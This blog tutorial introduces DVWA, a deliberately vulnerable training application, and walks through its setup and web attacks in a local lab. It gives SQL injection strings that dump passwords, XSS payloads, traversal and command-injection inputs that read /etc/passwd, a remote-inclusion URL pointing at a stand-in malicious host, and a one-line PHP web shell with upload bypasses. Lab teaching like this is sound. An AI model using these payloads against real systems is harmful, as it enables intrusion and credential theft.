DVWA: The Ultimate Web Application for Learning Security Testing

byEngr. M.A. Rashid Rony
0

 

Guide to DVWA: The Ultimate Web Application for Learning Security Testing

The Damn Vulnerable Web Application (DVWA) is a purposefully insecure open-source PHP/MySQL web application designed to help security professionals, developers, and students learn about web vulnerabilities in a controlled, legal environment. By simulating real-world security flaws, DVWA serves as a hands-on training platform for understanding and mitigating risks such as SQL injection, cross-site scripting (XSS), and file inclusion vulnerabilities. This article provides a detailed exploration of DVWA, including its features, installation, practical usage examples, and step-by-step tutorials on web hacking techniques—all emphasizing ethical and legal use. As of September 2025, this guide reflects the latest DVWA version (1.10) and best practices for leveraging it as a learning tool.

Introduction to DVWA

DVWA is an educational tool created to teach web application security through hands-on practice. It intentionally incorporates vulnerabilities listed in the OWASP Top Ten, such as SQL injection, XSS, and insecure file uploads, across multiple security levels (Low, Medium, High, Impossible). This allows users to test exploitation techniques and learn secure coding practices in a safe environment.

DVWA is widely used in cybersecurity training, CTF (Capture The Flag) events, and penetration testing labs. Its open-source nature (GNU GPL) and compatibility with local or server-based setups make it accessible for beginners and experts alike.

History and Development

Developed by RandomStorm and maintained by the DVWA team, the project started as a simple vulnerable web app and has evolved into a robust training platform. Version 1.10 (released in 2015, with minor updates since) includes a modernized interface, additional vulnerabilities, and Docker support. The project is hosted on GitHub, with active community contributions ensuring its relevance.

Key Features

DVWA offers a rich set of features for learning web security:

  • Vulnerability Modules: Covers SQL injection, XSS, file inclusion, CSRF, command injection, and more.
  • Security Levels: Low (no protections), Medium (basic mitigations), High (advanced mitigations), Impossible (secure).
  • User-Friendly Interface: Simple PHP/MySQL web app with setup instructions.
  • Cross-Platform: Runs on local machines, servers, or Docker.
  • Extensible: Easy to modify for custom vulnerabilities or CTF challenges.
  • Educational Focus: Includes help sections for each vulnerability module.
  • Integration: Compatible with tools like Burp Suite, OWASP ZAP, and sqlmap.

Installation and Setup

Requirements

  • Web server: Apache or Nginx.
  • PHP 5.2+ (PHP 7 recommended).
  • MySQL 5.0+.
  • Optional: Docker or XAMPP/LAMP stack.

Installation

Local Setup (Linux/Windows/macOS)

  1. Install Dependencies:
    • Linux (Ubuntu): sudo apt-get install apache2 php php-mysql mysql-server.
    • Windows/macOS: Use XAMPP (includes Apache, PHP, MySQL).
  2. Download DVWA: Clone from GitHub (git clone https://github.com/digininja/DVWA.git) or download ZIP from dvwa.co.uk.
  3. Extract and Configure:
    • Move to web root (e.g., /var/www/html on Linux, htdocs in XAMPP).
    • Edit config/config.inc.php: Set database credentials (default: root, no password).

4.  $_DVWA['db_user'] = 'root';

5.  $_DVWA['db_password'] = '';

$_DVWA['db_database'] = 'dvwa';

  1. Set Up Database:
    • Start MySQL: sudo systemctl start mysql (Linux) or via XAMPP.
    • Access MySQL: mysql -u root -p, create database: CREATE DATABASE dvwa;.
  2. Access DVWA: Navigate to http://localhost/DVWA/setup.php, click Create / Reset Database.
  3. Log In: Default credentials: admin/password.

Docker

docker pull vulnerables/web-dvwa

docker run -d -p 80:80 vulnerables/web-dvwa

Access at http://localhost/setup.php.

Troubleshooting

  • Database Errors: Verify MySQL credentials and service status.
  • File Permissions: Ensure web server can write to DVWA/external/phpids_log.txt (e.g., chmod 666).
  • PHP Issues: Enable allow_url_include in php.ini for file inclusion tests.

Practical Usage Examples

Prerequisites: DVWA installed, browser, testing tools (e.g., OWASP ZAP, Burp Suite, sqlmap), and a controlled environment. Always test on your own setup or with explicit permission.

Example 1: Basic Navigation and Setup

  1. Access DVWA: http://localhost/DVWA.
  2. Log in: admin/password.
  3. Set security level: DVWA Security > Low (for beginners).
  4. Explore modules: Click SQL Injection, XSS (Reflected), etc., to view vulnerable pages.

Example 2: Using OWASP ZAP with DVWA

  1. Configure ZAP proxy: Set browser to 127.0.0.1:8080, import ZAP’s CA certificate.
  2. Add DVWA to context: Sites > Right-click http://localhost/DVWA > Include in Context > Default Context.
  3. Spider: Tools > Spider > New Scan, select DVWA, start.
  4. Active scan: Tools > Active Scan > New Scan, select context, start.
  5. Review Alerts for vulnerabilities (e.g., XSS, SQL injection).

Example 3: Manual Testing with Burp Suite

  1. Set browser proxy to Burp: 127.0.0.1:8080.
  2. Navigate DVWA modules (e.g., SQL Injection).
  3. Intercept requests in Burp’s Proxy > Intercept, modify inputs (e.g., id=1' OR '1'='1), and forward.
  4. Check responses for vulnerabilities.

Web Application Hacking Techniques with DVWA

Note: These techniques are for educational purposes in a controlled environment like DVWA. Testing on unauthorized systems is illegal under laws like the U.S. Computer Fraud and Abuse Act or GDPR.

1. SQL Injection (Low Security)

Goal: Extract data from the database. Steps:

  1. Navigate to SQL Injection module, set to Low.
  2. Enter 1 in the input field, submit to see user data.
  3. Test injection: Input 1' OR '1'='1 and submit.
    • Result: Displays all users (e.g., admin, gordonb).
  4. Advanced: Use 1' UNION SELECT user, password FROM users # to extract usernames and passwords.
  5. Automate with sqlmap:

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=<your_session_id>" --dbs

    • Outputs database names (e.g., dvwa).

2. Cross-Site Scripting (XSS) - Reflected (Low Security)

Goal: Inject and execute malicious scripts. Steps:

  1. Go to XSS (Reflected) module, set to Low.
  2. Input <script>alert('XSS')</script> and submit.
    • Result: Browser shows an alert box.
  3. Test persistence: Try <img src=x onerror=alert('XSS')> for alternative injection.
  4. Use ZAP Fuzzer: Tools > Fuzzer, select input field, add XSS payloads, and check for alerts.
  5. Medium/High levels: Inspect source to bypass filters (e.g., use <sCrIpT> or encoded payloads).

3. Cross-Site Scripting (XSS) - Stored (Low Security)

Goal: Store malicious scripts for all users. Steps:

  1. Navigate to XSS (Stored), set to Low.
  2. Enter name and message: <script>alert('Stored XSS')</script>.
  3. Submit; refresh to see alert on page load.
  4. Test with ZAP: Spider, then active scan to detect stored XSS.
  5. Medium level: Use encoded payloads (e.g., %3Cscript%3Ealert('XSS')%3C/script%3E).

4. File Inclusion (Low Security)

Goal: Access unauthorized files or execute remote code. Steps:

  1. Go to File Inclusion module, set to Low.
  2. Test local file inclusion: Input ../../etc/passwd in the URL (e.g., http://localhost/DVWA/vulnerabilities/fi/?page=../../etc/passwd).
    • Result: Displays file contents if server allows.
  3. Test remote file inclusion (if allow_url_include is enabled): Input http://malicious.com/shell.php.
  4. Medium level: Try bypassing filters with ..%2F or null bytes (%00).

5. Command Injection (Low Security)

Goal: Execute system commands. Steps:

  1. Navigate to Command Injection, set to Low.
  2. Input 127.0.0.1 && whoami and submit.
    • Result: Displays web server user (e.g., www-data).
  3. Try advanced commands: 127.0.0.1; cat /etc/passwd.
  4. Automate with Burp Intruder: Use payloads like && ls, ; id to test commands.
  5. Medium/High levels: Inspect source to bypass input sanitization (e.g., use | instead of &&).

6. Cross-Site Request Forgery (CSRF) (Low Security)

Goal: Trick users into performing unintended actions. Steps:

  1. Go to CSRF module, set to Low.
  2. Submit a new password (e.g., test123).
  3. Craft a malicious link: <a href="http://localhost/DVWA/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change">Click Me</a>.
  4. Host on a separate page; clicking changes the password.
  5. Medium level: Use ZAP to intercept and forge POST requests with valid tokens.

7. File Upload Vulnerabilities (Low Security)

Goal: Upload malicious files. Steps:

  1. Navigate to File Upload, set to Low.
  2. Create a PHP shell: <?php system($_GET['cmd']); ?>, save as shell.php.
  3. Upload shell.php via the upload form.
  4. Access: http://localhost/DVWA/hackable/uploads/shell.php?cmd=whoami.
    • Result: Executes command (e.g., www-data).
  5. Medium level: Bypass extension checks with shell.php.jpg or MIME tampering in Burp.

Legal and Ethical Considerations

DVWA is designed for legal, controlled testing. Using these techniques on unauthorized systems violates laws like the U.S. Computer Fraud and Abuse Act or GDPR. Always test in a lab environment or with explicit permission from system owners. The DVWA team promotes ethical use, emphasizing learning over malicious activity.

Best Practices

  • Use Isolated Environments: Run DVWA in a VM or Docker to avoid affecting live systems.
  • Combine Tools: Pair with OWASP ZAP, Burp Suite, or sqlmap for comprehensive testing.
  • Learn Secure Coding: Study the Impossible security level to understand mitigations.
  • Document Findings: Save ZAP/Burp sessions or screenshots for learning.
  • Stay Updated: Check GitHub for updates.

Limitations

  • Simplified Vulnerabilities: Real-world systems may have complex protections.
  • Learning-Focused: Not suitable for production environments.
  • Basic Interface: Lacks advanced reporting compared to commercial tools.

Conclusion

DVWA is an invaluable tool for learning web application security, offering hands-on practice with real-world vulnerabilities in a safe environment. By following the examples and techniques outlined, you can build skills in ethical hacking and secure development. For updates and community support, visit dvwa.co.uk or the GitHub repository.

To convert this Markdown to .docx for your website, use Pandoc: pandoc dvwa-tutorial.md -o dvwa-tutorial.docx. Alternatively, paste into Microsoft Word or a CMS with Markdown support.

 

Tags:

Post a Comment

Previous Post Next Post